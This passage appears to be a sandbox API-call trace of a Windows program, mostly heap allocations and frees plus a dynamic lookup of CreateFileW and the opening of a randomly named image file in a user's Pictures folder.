(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0094.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0094.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0094.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0094.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0094.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0094.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0094.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0094.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0094.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0094.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0094.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0094.220] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0094.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0094.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0094.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0094.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0094.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0094.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0094.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0094.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0094.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0094.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0094.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.228] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0094.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0094.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0094.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca8b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0094.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.229] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0094.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0094.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0094.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0094.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0094.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0094.230] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\J06YyOv018ZbSPW7yM.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\j06yyov018zbspw7ym.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0094.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0094.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0094.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0094.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0094.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0094.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0094.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0094.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0094.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0094.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0094.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.232] FreeLibrary (hLibModule=0x772d0000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0094.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: 